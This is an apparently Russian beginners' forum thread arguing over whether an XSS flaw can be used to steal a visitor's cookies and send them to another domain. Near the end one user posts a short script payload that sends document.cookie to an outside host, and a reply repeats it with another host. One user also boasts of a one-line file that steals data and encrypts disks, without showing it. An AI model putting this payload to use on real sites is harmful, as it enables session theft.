Обучение/Помощь новичкам | xss уязвимость
Isov
Тема закрыта by
BERLIN
Причина: Офф
BERLIN
Причина: Офф
Вилы Выкидные Jack Sparrow (21.05.2021 в 00:33)
Какая разница чужой домен. XSS она и трактуется как «межсайтовый скриптинг». Если есть такого рода уязвимость на сайте, я могу что хочешь у пользователя угнать, включая его куки. Можно переадресовать его на другую страницу, даже на другой домен. В общем, XSS опасна тем, что выполнить там можно все, что умеет JS.
Какая разница чужой домен. XSS она и трактуется как «межсайтовый скриптинг». Если есть такого рода уязвимость на сайте, я могу что хочешь у пользователя угнать, включая его куки. Можно переадресовать его на другую страницу, даже на другой домен. В общем, XSS опасна тем, что выполнить там можно все, что умеет JS.
ты внедрил мне в ЛС сообщение на JS, которое берёт из браузера куки, админ у меня в ЛС не обрабатывает сущности: я если открою почту, то выполнится JSкоторый взял мои куки из моего браузера )))
теперь этот JS должен отправить мои куки ТЕБЕ
КУДА? ГДЕ ОБРАБОТЧИК, КОТОРЫЙ ПОЛУЧАЕТ ДАННЫЕ ПО API?
мой домен - А
твой домен - В
если куки принадлежат домену А, то получить их можно XSS скриптом - вытянуть в переменную при запуске XSS, но отправить её на домен B нельзя без авторизации API
Jack Sparrow , вот тебе кратко: на домене А запущена ссылка: https://B/получить данные с А
отшит нахер такой запрос
не обязан мой сервер обрабатывать запросы ТВОЕГО сервера - понял?
________
посл. ред. 21.05.2021 в 00:58; всего 1 раз(а); by Вилы Выкидные
отшит нахер такой запрос
не обязан мой сервер обрабатывать запросы ТВОЕГО сервера - понял?
________
посл. ред. 21.05.2021 в 00:58; всего 1 раз(а); by Вилы Выкидные
Вилы Выкидные (20.05.2021 в 20:59)
ахахахахаха, днарина ты, у ТС вопрос, как зачистить XSS, которую внедряет пользователь POST запросом (выполняется скрипт), ты днарина пишешь что по XSS можно куки увести
ПОКАЗЫВАЕМ днарина мне мой SID, внедри XSS, чтобы она тебе с ЧУЖОГО домена прислала куки моего браузера, дно тупое фуфел ты
ахахахахаха, днарина ты, у ТС вопрос, как зачистить XSS, которую внедряет пользователь POST запросом (выполняется скрипт), ты днарина пишешь что по XSS можно куки увести
ПОКАЗЫВАЕМ днарина мне мой SID, внедри XSS, чтобы она тебе с ЧУЖОГО домена прислала куки моего браузера, дно тупое фуфел ты
Могу дать безобидный батник в 1 строку, который украдёт все что есть у тебя на компе, а потом зашифрует все диски
Jack Sparrow Вилы Выкидные (21.05.2021 в 00:50)
ты внедрил мне в ЛС сообщение на JS, которое берёт из браузера куки, админ у меня в ЛС не обрабатывает сущности: я если открою почту, то выполнится JSкоторый взял мои куки из моего браузера )))
теперь этот JS должен отправить мои куки ТЕБЕ
КУДА? ГДЕ ОБРАБОТЧИК, КОТОРЫЙ ПОЛУЧАЕТ ДАННЫЕ ПО API?
мой домен - А
твой домен - В
если куки принадлежат домену А, то получить их можно XSS скриптом - вытянуть в переменную при запуске XSS, но отправить её на домен B нельзя без авторизации API
ты внедрил мне в ЛС сообщение на JS, которое берёт из браузера куки, админ у меня в ЛС не обрабатывает сущности: я если открою почту, то выполнится JSкоторый взял мои куки из моего браузера )))
теперь этот JS должен отправить мои куки ТЕБЕ
КУДА? ГДЕ ОБРАБОТЧИК, КОТОРЫЙ ПОЛУЧАЕТ ДАННЫЕ ПО API?
мой домен - А
твой домен - В
если куки принадлежат домену А, то получить их можно XSS скриптом - вытянуть в переменную при запуске XSS, но отправить её на домен B нельзя без авторизации API
Ладно, я воздержусь от дискуссии)
Scammer (21.05.2021 в 01:03)
Могу дать безобидный батник в 1 строку, который украдёт все что есть у тебя на компе, а потом зашифрует все диски
Могу дать безобидный батник в 1 строку, который украдёт все что есть у тебя на компе, а потом зашифрует все диски
я его могу запустить в браузере?
Jack Sparrow (21.05.2021 в 01:06)
Ладно, я воздержусь от дискуссии)
Ладно, я воздержусь от дискуссии)
я вот сейчас установлю JS от аналитики ГУГЛА и начну сразу получать инфу, правильно?
или мне нужно зарегистрироваться, получить токен авторизации, привязать его к ДОМЕНУ?
Вилы Выкидные (21.05.2021 в 01:15)
я вот сейчас установлю JS от аналитики ГУГЛА и начну сразу получать инфу, правильно?
или мне нужно зарегистрироваться, получить токен авторизации, привязать его к ДОМЕНУ?
я вот сейчас установлю JS от аналитики ГУГЛА и начну сразу получать инфу, правильно?
или мне нужно зарегистрироваться, получить токен авторизации, привязать его к ДОМЕНУ?
Причём тут это. Это создаётся для идентификации. Не сравнивай Гугл и простой код. Обычным постом из js можно отправить любые данные куда угодно.
________
посл. ред. 21.05.2021 в 01:36; всего 1 раз(а); by Jack Sparrow
Вилы Выкидные (21.05.2021 в 01:13)
я его могу запустить в браузере?
я его могу запустить в браузере?
Как расширение для браузера да, тогда оно будет запускать с использованием движка самого браузера 👀
Но это уже выйдет за рамки одной строки и вовсе перестанет быть консольным скриптом 👀
Пупсь верно говорит, перестань бухать
PAIN Вилы Выкидные (21.05.2021 в 00:50) ты внедрил мне в ЛС сообщение на JS, которое берёт из браузера куки, админ у меня в ЛС не обрабатывает сущности: я если открою почту, то выполнится JSкоторый взял мои куки из моего браузера ))) теперь этот JS должен отправить мои куки ТЕБЕ КУДА? ГДЕ ОБРАБОТЧИК, КОТОРЫЙ ПОЛУЧАЕТ ДАННЫЕ ПО API? мой домен - А твой домен - В если куки принадлежат домену А, то получить их можно XSS скриптом - вытянуть в переменную при запуске XSS, но отправить её на домен B нельзя без авторизации API
html
<script> img = new Image(); img.src = "https://domain.ru/image.php?cookie="+document.cookie; </script> ________
посл. ред. 21.05.2021 в 01:42; всего 1 раз(а); by PAIN
PAIN (21.05.2021 в 01:42) изи
что это за бред? html
<script> img = new Image(); img.src = "https://domain.ru/image.php?cookie="+document.cookie; </script> javascript
<script> img = new Image(); img.src = "https://bym.guru/image.php?cookie="+document.cookie; </script>